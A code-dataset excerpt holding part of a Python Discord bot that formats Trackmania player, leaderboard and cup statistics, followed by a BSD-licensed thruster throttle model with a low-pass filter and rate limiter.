log.debug("Player Has Not Won a Single Royal Match")
progression_to_next_div = "0"
log.debug(
f"Creating Royal Data String with {rank}, {wins}, {current_div} and {progression_to_next_div}"
)
royal_data_string = f"```Rank: {rank}\nWins: {wins}\nCurrent Division: {current_div}\nProgression to Next Division: {progression_to_next_div}%```"
log.debug(f"Created Royal Data String -> {royal_data_string}")
return royal_data_string
except:
return (
"An Error Occured While Getting Royal Data, Player has not played Royal"
)
def _get_matchmaking_data(self, raw_player_data: dict) -> str:
"""Gets the matchmaking data of the player as a string"""
log.debug("Getting Matchmaking Data")
try:
matchmaking_data = raw_player_data["matchmaking"][0]
rank = matchmaking_data["info"]["rank"]
score = matchmaking_data["info"]["score"]
current_div = int(matchmaking_data["info"]["division"]["position"])
log.debug("Opening the MM Ranks File")
with open(
"./bot/resources/json/mm_ranks.json", "r", encoding="UTF-8"
) as file:
mm_ranks = json.load(file)
current_div = mm_ranks["rank_data"][str(current_div - 1)]
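            # mm_ranks.json maps the zero-indexed division position to a human-readable rank name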
log.debug("Calculating Progression to Next Division")
progression_to_next_div = (
round(
(score - matchmaking_data["info"]["division"]["minpoints"])
/ (
matchmaking_data["info"]["division"]["maxpoints"]
- matchmaking_data["info"]["division"]["minpoints"]
+ 1
),
4,
)
* 100
)
log.debug(
f"Creating Matchmaking Data String with {rank}, {score}, {current_div}, {progression_to_next_div}"
)
matchmaking_data_string = f"```Rank: {rank}\nScore: {score}\nCurrent Division: {current_div}\nProgression to Next Division: {progression_to_next_div}%```"
log.debug(f"Created Matchmaking Data String -> {matchmaking_data_string}")
return matchmaking_data_string
except:
log.error("Player has never Played Matchmaking")
return "An error Occured While Getting Matchmaking Data, Player has not played Matchmaking"
def _get_trophy_count(self, raw_player_data: dict) -> str:
"""The trophy counts as a string"""
log.debug("Getting Trophy Counts")
trophy_count_string = "```\n"
log.debug("Adding Total Points")
total_points = Commons.add_commas(raw_player_data["trophies"]["points"])
trophy_count_string += f"Total Points: {total_points}\n\n"
log.debug(f"Added Total Points -> {total_points}")
for i, trophy_count in enumerate(raw_player_data["trophies"]["counts"]):
trophy_count_string = (
trophy_count_string + f"Trophy {i + 1}: {trophy_count}\n"
)
trophy_count_string += "```"
log.debug(f"Final Trophy Count -> {trophy_count_string}")
return trophy_count_string
def _get_zones_and_positions(self, raw_player_data) -> str:
"""
Converts raw_player_data into location and their ranks
"""
ranks_string = ""
log.debug("Getting Zones")
zone_one = raw_player_data["trophies"]["zone"]["name"]
zone_two = raw_player_data["trophies"]["zone"]["parent"]["name"]
zone_three = raw_player_data["trophies"]["zone"]["parent"]["parent"]["name"]
try:
zone_four = raw_player_data["trophies"]["zone"]["parent"]["parent"][
"parent"
]["name"]
except:
zone_four = ""
log.debug(f"Got Zones -> {zone_one}, {zone_two}, {zone_three}, {zone_four}")
log.debug("Getting Position Data")
raw_zone_positions = raw_player_data["trophies"]["zonepositions"]
zone_one_position = raw_zone_positions[0]
zone_two_position = raw_zone_positions[1]
zone_three_position = raw_zone_positions[2]
if zone_four != "":
zone_four_position = raw_zone_positions[3]
else:
zone_four_position = -1
log.debug("Got Position Data")
log.debug("Making string for position data")
ranks_string = "```\n"
ranks_string += f"{zone_one} - {zone_one_position}\n"
ranks_string += f"{zone_two} - {zone_two_position}\n"
ranks_string += f"{zone_three} - {zone_three_position}\n"
if zone_four != "":
ranks_string += f"{zone_four} - {zone_four_position}\n"
ranks_string += "```"
log.debug(f"Final Ranks String is {ranks_string}")
log.debug("Creating Zones String")
zones_string = f"```\n{zone_one}, {zone_two}, {zone_three}"
if zone_four != "":
zones_string += f", {zone_four}"
zones_string += "\n```"
return zones_string, ranks_string
def _add_meta_details(
self,
player_page: discord.Embed,
raw_player_data: dict,
) -> discord.Embed:
"""Adds the Metadata of a player to the first page of the embed
Args:
player_page (discord.Embed): the first page of player details
raw_player_data (dict): player data from the api
Returns:
discord.Embed: First page of the embed after metadata has been added
"""
log.debug("Adding Meta Details for Player")
meta_data = raw_player_data["meta"]
try:
log.debug("Checking if Player has Twitch")
twitch_name = meta_data["twitch"]
player_page.add_field(
name="[<:twitch:895250576751853598>] Twitch",
value=f"[{twitch_name}](https://twitch.tv/{twitch_name})",
inline=True,
)
log.debug("Twitch Added for Player")
except:
log.debug("Player does not have a Twitch Account Linked to TMIO")
try:
log.debug("Checking if Player has Twitter")
twitter_name = meta_data["twitter"]
player_page.add_field(
name="[<:twitter:895250587157946388>] Twitter",
value=f" [{twitter_name}](https://twitter.com/{twitter_name})",
inline=True,
)
log.debug("Twitter Added for Player")
except:
log.debug("Player does not have a Twitter Account Linked to TMIO")
try:
log.debug("Checking if Player has YouTube")
youtube_link = meta_data["youtube"]
player_page.add_field(
name="[<:youtube:895250572599513138>] YouTube",
value=f"[YouTube](https://youtube.com/channel/{youtube_link})",
inline=True,
)
log.debug("YouTube Added for Player")
except:
log.debug("Player does not have a YouTube Account Linked to TMIO")
log.debug("Adding TMIO")
display_name = raw_player_data["displayname"]
player_id = raw_player_data["accountid"]
player_page.add_field(
name="TMIO",
value=f"[{display_name}](https://trackmania.io/#/player/{player_id})",
)
try:
log.debug("Checking if TMGL Player")
if meta_data["tmgl"] is True:
player_page.add_field(
name="TMGL", value="This Player Participates in TMGL", inline=True
)
log.debug("Added TMGL Field")
except:
log.debug("Player does not participate in TMGL")
log.debug("Added TMIO Link")
log.debug(f"Returning {player_page}")
return player_page
class TOTDUtils:
@staticmethod
def _download_thumbail(url: str) -> None:
"""Downloads the Thumbnail from Nadeo's API and stores in `./bot/resources/temp/totd.png`"""
if os.path.exists("./bot/resources/temp/totd.png"):
log.debug("Thumbnail already downloaded")
return
req = requests.get(url, stream=True)
if req.status_code == 200:
log.debug("Image was retrieved succesfully")
req.raw.decode_content = True
log.debug("Saving Image to File")
with open("./bot/resources/temp/totd.png", "wb") as file:
shutil.copyfileobj(req.raw, file)
else:
log.critical("Image could not be retrieved")
@staticmethod
    def _parse_mx_tags(tags: str) -> str:
"""Parses Maniaexchange tags to their strings
Args:
tags (str): The tags as a string of `ints`
Returns:
str: The tags as a string of `strings`
"""
log.debug(f"Tags -> {tags}")
log.debug("Removing Spaces")
tags.replace(" ", "")
log.debug(f"Without Spaces -> {tags}")
tags = tags.split(",")
tag_string = ""
with open("./bot/resources/json/mxtags.json", "r") as file:
mxtags = json.load(file)["mx"]
for i, tag in enumerate(tags):
log.debug(f"Converting {tag}")
for j in range(len(mxtags)):
if int(tag) == int(mxtags[j]["ID"]):
tag_string = tag_string + mxtags[j]["Name"] + ", "
log.debug(f"Tag String -> {tag_string}")
return tag_string[:-2]
@staticmethod
async def today():
"""The data of the current day's totd"""
log.info("Creating an API Client")
api_client = APIClient()
log.info("Created an API Client")
log.debug("Getting TOTD Data from API")
totd_data = await api_client.get("http://localhost:3000/tm2020/totd/latest")
log.debug("Parsing TOTD Data")
map_name = totd_data["name"]
author_name = totd_data["authorplayer"]["name"]
thumbnail_url = totd_data["thumbnailUrl"]
author_time = Commons.format_seconds(int(totd_data["authorScore"]))
gold_time = Commons.format_seconds(int(totd_data["goldScore"]))
silver_time = Commons.format_seconds(int(totd_data["silverScore"]))
bronze_time = Commons.format_seconds(int(totd_data["bronzeScore"]))
nadeo_uploaded = totd_data["timestamp"]
wr_holder = totd_data["leaderboard"]["tops"][0]["player"]["name"]
wr_time = Commons.format_seconds(
int(totd_data["leaderboard"]["tops"][0]["time"])
)
tmio_id = totd_data["mapUid"]
log.debug("Parsed TOTD Data")
log.debug("Parsing Download Link")
download_link = totd_data["fileUrl"]
log.debug("Parsed Download Link")
log.debug("Parsing Time Uploaded to Timestamp")
nadeo_timestamp = (
datetime.strptime(nadeo_uploaded[:-6], "%Y-%m-%dT%H:%M:%S")
.replace(tzinfo=timezone.utc)
.timestamp()
)
log.debug("Parsed Time Uploaded to Timestamps")
log.debug("Creating Strings from Parsed Data")
medal_times = f"<:author:894268580902883379> {author_time}\n<:gold:894268580970004510> {gold_time}\n<:silver:894268580655411220> {silver_time}\n<:bronze:894268580181458975> {bronze_time}"
world_record = f"Holder: {wr_holder}\nTime: {wr_time}"
nadeo_uploaded = f"<t:{int(nadeo_timestamp)}:R>"
log.debug("Created Strings from Parsed Data")
log.debug(
"Getting Map Thumbnail\nChecking if map Thumbnail has Already been Downloaded"
)
if not os.path.exists("./bot/resources/temp/totd.png"):
log.critical("Map Thumbail has not been downloaded")
TOTDUtils._download_thumbail(thumbnail_url)
log.debug("Parsing TM Exchange Data")
try:
mania_tags = totd_data["exchange"]["Tags"]
mx_uploaded = totd_data["exchange"]["UploadedAt"]
tmx_code = totd_data["exchange"]["TrackID"]
try:
mx_dt = datetime.strptime(mx_uploaded[:-3], "%Y-%m-%dT%H:%M:%S")
except ValueError:
mx_dt = datetime.strptime(mx_uploaded[:-4], "%Y-%m-%dT%H:%M:%S")
mx_timestamps = mx_dt.replace(tzinfo=timezone.utc).timestamp()
mx_uploaded = f"<t:{int(mx_timestamps)}:R>"
except:
log.critical("Map has never been uploaded to trackmania.exchange")
log.debug("Creating Embed")
current_day = datetime.now(timezone(timedelta(hours=5, minutes=30))).strftime(
"%d"
)
current_month = datetime.now(timezone(timedelta(hours=5, minutes=30))).strftime(
"%B"
)
# Add Day Suffix
if int(current_day) % 10 == 1:
day_suffix = "st"
elif int(current_day) % 10 == 2:
day_suffix = "nd"
elif int(current_day) % 10 == 3:
day_suffix = "rd"
else:
day_suffix = "th"
embed = EZEmbed.create_embed(
title=f"Here is the {current_day}{day_suffix} {current_month} TOTD",
color=Commons.get_random_color(),
)
log.debug("Creating Image File")
image = discord.File("./bot/resources/temp/totd.png", filename="totd.png")
embed.set_image(url="attachment://totd.png")
embed.add_field(name="Map Name", value=map_name, inline=False)
embed.add_field(name="Author", value=author_name, inline=True)
try:
embed.add_field(
name="Tags", value=TOTDUtils._parse_mx_tags(mania_tags), inline=False
)
except:
pass
embed.add_field(
name="Time Uploaded to Nadeo server", value=nadeo_uploaded, inline=False
)
try:
embed.add_field(name="Time Uploaded to TMX", value=mx_uploaded, inline=True)
except:
pass
embed.add_field(name="Medal Times", value=medal_times, inline=False)
embed.add_field(name="Word record", value=world_record, inline=False)
tmio_link = f"https://trackmania.io/#/leaderboard/{tmio_id}"
try:
tmx_link = f"https://trackmania.exchange/maps/{tmx_code}/"
except:
tmx_link = None
log.debug("Created Embed")
log.info("Closing the API Client")
await api_client.close()
log.info("Closed the API Embed")
return embed, image, download_link, tmio_link, tmx_link
class Leaderboards:
@staticmethod
def get_campaign_ids(year: str = "2021", season: str = "Fall") -> list[str]:
"""Gets a list of all campaign ids for a given year and season
Args:
year (str, optional): The year of the season. Defaults to "2021".
season (str, optional): The season itself. Defaults to "Fall".
Returns:
list[str]: List of ids
"""
log.debug(f"Opening {year}/{season.lower()} Data File")
with open(
f"./bot/resources/json/campaign/{year}/{season.lower()}.json",
"r",
encoding="UTF-8",
) as file:
file_data = json.load(file)
id_list = file_data["ids"]
log.debug("Not Ignoring First Five Maps")
return id_list
@staticmethod
async def update_campaign_leaderboards(
id_list: list[str],
year: str = "2021",
season: str = "Fall",
skip_first_five: bool = False,
):
"""Updates the leaderboard files for the campaign
Args:
id_list (list[str]): Campaign map id list
year (str, optional): The year of the season. Defaults to "2021"
season (str, optional): The season itself. Defaults to "Fall".
"""
log.info("Creating APIClient for Updating Campaign Leaderboards")
api_client = APIClient()
log.info("Created APIClient for Updating Campaign Leaderboards")
for i, id in enumerate(id_list):
leaderboard_data = []
log.debug("Getting Data from API")
leaderboard_data = await api_client.get(
f"http://localhost:3000/tm2020/leaderboard/{id}/5"
)
log.debug("Got Data from API")
with open(
f"./bot/resources/leaderboard/{year}/{season.lower()}/{i + 1}.json",
"w",
encoding="UTF-8",
) as file:
log.debug(f"Dumping Data to File -> {year}>{season}>{i+1}")
json.dump(leaderboard_data, file, indent=4)
log.debug("Sleeping for 10s")
# time.sleep(10)
await asyncio.sleep(10)
log.debug(f"Finished Map #{i + 1}")
await api_client.close()
@staticmethod
def get_player_list(map_no: str, year: str = "2021", season: str = "Fall"):
log.debug(f"Opening File, Map No -> {map_no}")
with open(
f"./bot/resources/leaderboard/{year}/{season.lower()}/{map_no}.json",
"r",
encoding="UTF-8",
) as file:
data = json.load(file)
player_list = []
log.debug("Appending Players")
for player in data:
player_list.append((player["player"]["name"], player["position"]))
return player_list
@staticmethod
def get_player_good_maps(
player_name: str, year: str = "2021", season: str = "Fall"
) -> discord.Embed:
log.debug(f"Getting Player Details for Player name -> {player_name}")
player_embed = EZEmbed.create_embed(
title=f"{player_name} is good at the following maps",
color=Commons.get_random_color(),
)
t100_str, t200_str, t300_str, t400_str, t500_str = "", "", "", "", ""
for i in range(6, 26, 1):
player_list = Leaderboards.get_player_list(str(i), year, season.lower())
for player_tuple in player_list:
if player_tuple[0].lower() == player_name.lower():
if int(player_tuple[1]) <= 100:
log.debug(f"{player_name} is a top 100 player for Map {i}")
t100_str = (
t100_str + str(i) + " - " + str(player_tuple[1]) + "\n"
)
elif int(player_tuple[1]) <= 200 and int(player_tuple[1]) > 100:
log.debug(f"{player_name} is a top 200 player for Map {i}")
t200_str = (
t200_str + str(i) + " - " + str(player_tuple[1]) + "\n"
)
elif int(player_tuple[1]) <= 300 and int(player_tuple[1]) > 200:
log.debug(f"{player_name} is a top 300 player for Map {i}")
t300_str = (
t300_str + str(i) + " - " + str(player_tuple[1]) + "\n"
)
elif int(player_tuple[1]) <= 400 and int(player_tuple[1]) > 300:
log.debug(f"{player_name} is a top 400 player for Map {i}")
t400_str = (
t400_str + str(i) + " - " + str(player_tuple[1]) + "\n"
)
elif int(player_tuple[1]) <= 500 and int(player_tuple[1]) > 400:
log.debug(f"{player_name} is a top 500 player for Map {i}")
t500_str = (
t500_str + str(i) + " - " + str(player_tuple[1]) + "\n"
)
if t100_str != "":
log.debug(f"Appending T100 String for {player_name}")
player_embed.add_field(
name="**Top 100**", value="```" + t100_str + "```", inline=False
)
else:
log.debug("Player does not have any top 100 ranks")
player_embed.add_field(
name="**Top 100**",
value="Player does not have any top 100 times for maps 06-25",
inline=False,
)
if t200_str != "":
log.debug(f"Appending Top 100 String for {player_name}")
player_embed.add_field(
name="**Top 200**", value="```" + t200_str + "```", inline=False
)
else:
log.debug("Player does not have any top 200 ranks")
player_embed.add_field(
name="**Top 200**",
value="Player does not have any top 200 times for maps 06-25",
inline=False,
)
if t300_str != "":
log.debug(f"Appending Top 100 String for {player_name}")
player_embed.add_field(
name="**Top 300**", value="```" + t300_str + "```", inline=False
)
else:
log.debug("Player does not have any top 300 ranks")
player_embed.add_field(
name="**Top 300**",
value="Player does not have any top 300 times for maps 06-25",
inline=False,
)
if t400_str != "":
log.debug(f"Appending Top 100 String for {player_name}")
player_embed.add_field(
name="**Top 400**", value="```" + t400_str + "```", inline=False
)
else:
log.debug("Player does not have any top 400 ranks")
player_embed.add_field(
name="**Top 400**",
value="Player does not have any top 400 times for maps 06-25",
inline=False,
)
if t500_str != "":
log.debug(f"Appending Top 100 String for {player_name}")
player_embed.add_field(
name="**Top 500**", value="```" + t500_str + "```", inline=False
)
else:
log.debug("Player does not have any top 500 ranks")
player_embed.add_field(
name="**Top 500**",
value="Player does not have any top 500 times for maps 06-25",
inline=False,
)
return player_embed
class COTDUtil:
@staticmethod
def get_best_rank_primary(cotd_data) -> int:
log.debug(
"Getting Best Primary Best Rank -> {}".format(
cotd_data["stats"]["bestprimary"]["bestrank"]
)
)
return cotd_data["stats"]["bestprimary"]["bestrank"]
@staticmethod
def get_best_div_primary(cotd_data) -> int:
log.debug(
"Getting Primary Best Div -> {}".format(
cotd_data["stats"]["bestprimary"]["bestdiv"]
)
)
return cotd_data["stats"]["bestprimary"]["bestdiv"]
@staticmethod
def get_best_rank_primary_time(cotd_data) -> int:
log.debug(
"Getting the time of Primary Best -> {}".format(
cotd_data["stats"]["bestprimary"]["bestranktime"]
)
)
return cotd_data["stats"]["bestprimary"]["bestranktime"]
@staticmethod
def get_best_div_primary_time(cotd_data) -> int:
log.debug(
"Getting the time of Primary Best Div -> {}".format(
cotd_data["stats"]["bestprimary"]["bestdivtime"]
)
)
return cotd_data["stats"]["bestprimary"]["bestdivtime"]
@staticmethod
def get_best_div_rank_primary(cotd_data) -> int:
log.debug(
"Getting the Best Rank in Div -> {}".format(
cotd_data["stats"]["bestprimary"]["bestrankindiv"]
)
)
return cotd_data["stats"]["bestprimary"]["bestrankindiv"]
@staticmethod
def get_best_rank_overall(cotd_data) -> int:
log.debug(
"Getting the Overall Best Rank -> {}".format(
cotd_data["stats"]["bestoverall"]["bestrank"]
)
)
return cotd_data["stats"]["bestoverall"]["bestrank"]
@staticmethod
def get_best_div_overall(cotd_data) -> int:
log.debug(
"Getting the Overall Best Div -> {}".format(
cotd_data["stats"]["bestoverall"]["bestdiv"]
)
)
return cotd_data["stats"]["bestoverall"]["bestdiv"]
@staticmethod
def get_best_rank_overall_time(cotd_data) -> int:
log.debug(
f'Getting the time of Overall Best Rank -> {cotd_data["stats"]["bestoverall"]["bestranktime"]}'
)
return cotd_data["stats"]["bestoverall"]["bestranktime"]
@staticmethod
def get_best_div_overall_time(cotd_data) -> int:
log.debug(
"Getting the time of Overall Best Div -> {}".format(
cotd_data["stats"]["bestoverall"]["bestdivtime"]
)
)
return cotd_data["stats"]["bestoverall"]["bestdivtime"]
@staticmethod
def get_best_div_rank_overall(cotd_data) -> int:
log.debug(
"Getting the Best Rank in Div Overall -> {}".format(
cotd_data["stats"]["bestoverall"]["bestrankindiv"]
)
)
return cotd_data["stats"]["bestoverall"]["bestrankindiv"]
@staticmethod
def return_cotds(cotd_data):
log.debug("Returning all COTDs")
return cotd_data["cotds"]
@staticmethod
def return_cotds_without_reruns(cotd_data):
log.debug("Returning COTDs without reruns")
cotds_safe = []
for cotd in cotd_data["cotds"]:
if "#2" in cotd["name"] or "#3" in cotd["name"]:
continue
cotds_safe.append(cotd)
return cotds_safe
@staticmethod
def get_num_cotds_played(cotds):
log.debug(f"Number of COTDs Played -> {len(cotds)}")
return len(cotds)
@staticmethod
def remove_unfinished_cotds(cotds):
log.debug("Looping around COTDs")
cotds_safe = []
for cotd in cotds:
if not cotd["score"] == 0:
cotds_safe.append(cotd)
log.debug(f"{len(cotds_safe)} COTDs Finished out of Given Set")
return cotds_safe
@staticmethod
def get_average_rank_overall(cotd_data):
cotds = COTDUtil.return_cotds(cotd_data)
cotds_played = COTDUtil.get_num_cotds_played(cotds)
rank_total = 0
# Looping Through COTDs
for cotd in cotds:
rank_total += int(cotd["rank"])
log.debug(f"Average Rank Overall -> {round(rank_total / cotds_played, 2)}")
return round(rank_total / cotds_played, 2)
@staticmethod
def get_average_rank_primary(cotd_data):
cotds = COTDUtil.return_cotds_without_reruns(cotd_data)
cotds_played = COTDUtil.get_num_cotds_played(cotds)
rank_total = 0
for cotd in cotds:
rank_total += int(cotd["rank"])
try:
log.debug(f"Average Rank Primary -> {round(rank_total / cotds_played, 2)}")
return round(rank_total / cotds_played, 2)
except:
log.debug("Average Rank Primary -> 0")
return 0
@staticmethod
def get_average_div_overall(cotd_data):
cotds = COTDUtil.return_cotds(cotd_data)
cotds_played = COTDUtil.get_num_cotds_played(cotds)
div_total = 0
# Looping Through COTDs
for cotd in cotds:
div_total += int(cotd["div"])
log.debug(f"Average Div Overall -> {round(div_total / cotds_played, 2)}")
return round(div_total / cotds_played, 2)
@staticmethod
def get_average_div_primary(cotd_data):
cotds = COTDUtil.return_cotds_without_reruns(cotd_data)
cotds_played = COTDUtil.get_num_cotds_played(cotds)
div_total = 0
for cotd in cotds:
div_total += int(cotd["div"])
try:
log.debug(f"Average Div Primary -> {round(div_total / cotds_played, 2)}")
return round(div_total / cotds_played, 2)
except:
log.debug("Average Div Primary -> 0")
return 0
@staticmethod
def get_average_div_rank_overall(cotd_data):
cotds = COTDUtil.return_cotds(cotd_data)
cotds_played = COTDUtil.get_num_cotds_played(cotds)
div_rank_total = 0
for cotd in cotds:
div_rank_total += int(cotd["div"])
log.debug(
f"Average Div Rank Overall -> {round(div_rank_total / cotds_played, 2)}"
)
return round(div_rank_total / cotds_played, 2)
@staticmethod
def get_average_div_rank_primary(cotd_data):
cotds = COTDUtil.return_cotds_without_reruns(cotd_data)
cotds_played = COTDUtil.get_num_cotds_played(cotds)
div_rank_total = 0
for cotd in cotds:
div_rank_total += int(cotd["divrank"])
try:
log.debug(
f"Average Div Rank Primary -> {round(div_rank_total / cotds_played, 2)}"
)
return round(div_rank_total / cotds_played, 2)
except:
log.debug("Average Div Rank Primary -> 0")
return 0
@staticmethod
def get_list_of_ranks_overall(cotd_data):
cotds = COTDUtil.return_cotds(cotd_data)
cotds = COTDUtil.remove_unfinished_cotds(cotds)
ranks = []
for cotd in cotds:
ranks.append(cotd["rank"])
log.debug(f"Ranks are {ranks[::-1]}")
return ranks[::-1]
@staticmethod
def get_list_of_ranks_primary(cotd_data):
cotds = COTDUtil.return_cotds_without_reruns(cotd_data)
cotds = COTDUtil.remove_unfinished_cotds(cotds)
ranks = []
for cotd in cotds:
ranks.append(cotd["rank"])
log.debug(f"Ranks are {ranks[::-1]}")
return ranks[::-1]
@staticmethod
def get_list_of_dates_overall(cotd_data):
cotds = COTDUtil.return_cotds(cotd_data)
cotds = COTDUtil.remove_unfinished_cotds(cotds)
timestamps = []
for cotd in cotds:
timestamps.append(cotd["name"][15:])
log.debug(f"Timestamps are {timestamps[::-1]}")
return timestamps[::-1]
@staticmethod
def get_list_of_dates_primary(cotd_data):
cotds = COTDUtil.return_cotds_without_reruns(cotd_data)
cotds = COTDUtil.remove_unfinished_cotds(cotds)
timestamps = []
for cotd in cotds:
timestamps.append(cotd["name"][15:])
log.debug(f"Timestamps are {timestamps[::-1]}")
return timestamps[::-1]
@staticmethod
def get_list_of_ids_overall(cotd_data):
cotds = COTDUtil.return_cotds(cotd_data)
cotds = COTDUtil.remove_unfinished_cotds(cotds)
ids = []
for cotd in cotds:
ids.append(cotd["id"])
log.debug(f"IDs are {ids[::-1]}")
return ids[::-1]
@staticmethod
def get_list_of_ids_primary(cotd_data):
cotds = COTDUtil.return_cotds_without_reruns(cotd_data)
cotds = COTDUtil.remove_unfinished_cotds(cotds)
ids = []
for cotd in cotds:
ids.append(cotd["id"])
log.debug(f"IDs are {ids[::-1]}")
return ids[::-1]
@staticmethod
def get_num_wins(cotd_data):
log.debug(
"Getting number of wins -> {}".format(cotd_data["stats"]["totalwins"])
)
return cotd_data["stats"]["totalwins"]
@staticmethod
def _create_rank_plot(
ranks: list, dates: list, ids: list, plot_name: str, image_name: str
):
log.debug("Clearing Plot")
plt.clf()
if len(dates) >= 40:
log.debug(
f"{plot_name} -> Player has played more than 40 COTDs, using ids instead of dates"
)
plt.plot(ids, ranks, label=plot_name)
plt.xlabel("COTD IDs")
else:
log.debug(
f"{plot_name} -> Player has less than 40 COTDs, using dates instead of ids"
)
plt.plot(dates, ranks, label=plot_name)
plt.xlabel("COTD Dates")
log.debug(f"{plot_name} -> Setting Plot Rotation to 90Deg")
plt.xticks(rotation=90)
log.debug(f"{plot_name} -> Setting YLabel to Ranks")
plt.ylabel("Ranks")
log.debug(f"{plot_name} -> Setting title to {plot_name}")
plt.title(f"Rank Graph for {plot_name}")
log.debug(f"{plot_name} -> Setting Tight Layout")
plt.tight_layout()
log.debug(f"{plot_name} -> Saving the Plot to Computer")
plt.savefig("./bot/resources/temp/" + image_name)
@staticmethod
def _concat_graphs():
log.info("Concatenating Graphs")
log.debug("Opening First Graph")
first_graph = cv2.imread("./bot/resources/temp/overallranks.png")
log.debug("First Graph Opened")
log.debug("Opening Second Graph")
second_graph = cv2.imread("./bot/resources/temp/primaryranks.png")
log.debug("Second Graph Opened")
log.debug("Concatenating Graphs")
concatenated_graphs = cv2.hconcat([first_graph, second_graph])
log.debug("Concatenated Graphs")
log.info("Saving Graphs")
cv2.imwrite("./bot/resources/temp/concatenated_graphs.png", concatenated_graphs)
class NotAValidUsername(Exception):
"""Raised when the Username given is not valid.
Args:
Exception ([type]): [description]
"""
def __init__(self, excp: Exception):
self.message = excp.message
def __str__(self):
return self.message if self.message is not None else None
| 35.756569 | 195 | 0.578832 | 45,807 | 0.990015 | 0 | 0 | 25,094 | 0.54235 | 16,164 | 0.349348 | 15,656 | 0.338369 |
1fed6ebbcca1ccb5af62d7ab28474d73bafe114f
| 4,535 |
py
|
Python
|
src/vehicle_core/model/throttle_model.py
|
decabyte/vehicle_core
|
623e1e993445713ab2ba625ac54be150077c2f1e
|
[
"BSD-3-Clause"
] | 1 |
2016-12-14T11:48:02.000Z
|
2016-12-14T11:48:02.000Z
|
src/vehicle_core/model/throttle_model.py
|
decabyte/vehicle_core
|
623e1e993445713ab2ba625ac54be150077c2f1e
|
[
"BSD-3-Clause"
] | null | null | null |
src/vehicle_core/model/throttle_model.py
|
decabyte/vehicle_core
|
623e1e993445713ab2ba625ac54be150077c2f1e
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Software License Agreement (BSD License)
#
# Copyright (c) 2014, Ocean Systems Laboratory, Heriot-Watt University, UK.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the Heriot-Watt University nor the names of
# its contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Original authors:
# Valerio De Carolis, Marian Andrecki, Corina Barbalata, Gordon Frost
from __future__ import division
import numpy as np
import scipy as sci
import scipy.signal
##pythran export predict_throttle(float[], float[], float[], float, float)
def predict_throttle(throttle_request, b, a, offset, limit):
"""This function returns the predicted throttle for each thruster given a throttle request using a low-pass filter
IIR filtering. See (http://en.wikipedia.org/wiki/Infinite_impulse_response) for more details.
The use of scipy is not possible if the pythran optimizer is employed with this module.
:param throttle_request: matrix of throttle request (N x M) (rows are different thrusters and columns are samples)
:param b: low-pass filter b coefficients
:param a: low-pass filter a coefficients
:param offset: samples offset in the throttle request
:param limit: throttle value hard limit
:return: throttle_model is the predicted value of the throttle
"""
# apply latency delay (offset is positive)
throttle_delayed = throttle_request[:, 0:-(offset + 1)]
throttle_model = np.zeros_like(throttle_delayed)
# apply low-pass filter (using scipy)
throttle_model = sci.signal.lfilter(b, a, throttle_delayed)
# # apply low-pass filter (using custom implementation)
# P = len(b)
# Q = len(a)
# N = throttle_delayed.shape[0]
# M = throttle_delayed.shape[1]
# K = np.maximum(P, Q)
#
# for i in xrange(N):
# for j in xrange(K, M):
#
# x = throttle_delayed[i, j-P:j]
# y = throttle_model[i, j-Q:j-1]
#
# throttle_model[i,j] = (np.sum(b[::-1] * x) - np.sum(a[:0:-1] * y)) / a[0]
# calculate the result and apply limits
return np.clip(throttle_model[:,-1], -limit, limit)
##pythran export rate_limiter(float[], float[], float, float)
def rate_limiter(new_throttle, last_throttle, rising_limit, falling_limit):
"""Models the change in thruster's throttle.
http://www.mathworks.co.uk/help/simulink/slref/ratelimiter.html
:param last_throttle: result of a previous iteration
:param new_throttle:
:param rising_limit: rising rate limit between two samples
:param falling_limit: falling rate limit between two samples
:return: next_throttle: the new throttle after applying rate limits
"""
diff_throttle = new_throttle - last_throttle
next_throttle = np.zeros_like(new_throttle)
for i, dth in enumerate(diff_throttle):
if dth > rising_limit:
next_throttle[i] = last_throttle[i] + rising_limit
elif dth < -falling_limit:
next_throttle[i] = last_throttle[i] - falling_limit
else:
next_throttle[i] = new_throttle[i]
return next_throttle
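if __name__ == '__main__':
    # Minimal usage sketch added for illustration; it is not part of the
    # original module. The IIR coefficients, offset and limit below are
    # assumed placeholder values, not the vehicle's calibrated filter.
    demo_request = np.tile(np.linspace(0.0, 1.0, 50), (4, 1))  # 4 thrusters, 50 samples
    demo_b = np.array([0.2])          # assumed filter numerator coefficients
    demo_a = np.array([1.0, -0.8])    # assumed filter denominator coefficients
    predicted = predict_throttle(demo_request, demo_b, demo_a, 2, 0.85)
    limited = rate_limiter(predicted, np.zeros_like(predicted), 0.1, 0.1)
    print(predicted, limited)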
| 40.855856 | 118 | 0.714443 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,508 | 0.773539 |
1fee9ed72e23e0f9892bd14d8b33f1a360d24471
| 1,605 |
py
|
Python
|
social_friends_finder/backends/vkontakte_backend.py
|
haremmaster/django-social-friends-finder
|
cad63349b19b3c301626c24420ace13c63f45ad7
|
[
"BSD-3-Clause"
] | 19 |
2015-01-01T16:23:06.000Z
|
